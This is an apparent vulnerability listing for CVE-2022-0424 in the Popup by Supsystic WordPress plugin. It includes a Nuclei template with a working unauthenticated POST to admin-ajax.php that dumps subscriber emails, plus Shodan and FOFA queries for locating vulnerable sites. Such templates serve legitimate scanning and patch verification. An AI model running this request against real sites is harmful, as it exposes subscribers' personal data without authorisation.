漏洞描述
The Popup by Supsystic WordPress plugin before 1.10.9 does not have any authentication and authorisation in an AJAX action, allowing unauthenticated attackers to call it and get the email addresses of subscribed users
CVE-2022-0424: Popup by Supsystic < 1.10.9 - Subscriber Email Addresses Disclosure
PoC代码[已公开]
id: CVE-2022-0424
info:
name: Popup by Supsystic < 1.10.9 - Subscriber Email Addresses Disclosure
author: s4e-io
severity: medium
description: |
The Popup by Supsystic WordPress plugin before 1.10.9 does not have any authentication and authorisation in an AJAX action, allowing unauthenticated attackers to call it and get the email addresses of subscribed users
remediation: Fixed in 1.10.9
reference:
- https://wpscan.com/vulnerability/1e4593fd-51e5-43ca-a244-9aaef3804b9f/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0424
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2022-0424
cwe-id: CWE-306
epss-score: 0.25772
epss-percentile: 0.96061
cpe: cpe:2.3:a:supsystic:popup:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: supsystic
product: popup
framework: wordpress
shodan-query: http.html:/wp-content/plugins/popup-by-supsystic
fofa-query: body=/wp-content/plugins/popup-by-supsystic
publicwww-query: "/wp-content/plugins/popup-by-supsystic"
tags: wpscan,cve,cve2022,wp,wp-plugin,wordpress,disclosure,popup,supsystic
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
page=subscribe&action=getListForTbl&reqType=ajax&search=@&_search=false&pl=pps&sidx=id&rows=10
matchers-condition: and
matchers:
- type: word
words:
- '"id":"'
- 'username":"'
- 'email":'
- 'hash":"'
- "_wpnonce"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100c8fd7e57d42bfc9f80894210e6edab292e6f68e94c476befa25f78dde4571800022057e00c7daad7969ebfdc80519cc68d876162f75e233723af8b0e4e899c1e3297:922c64590222798bb761d5b6d8e72950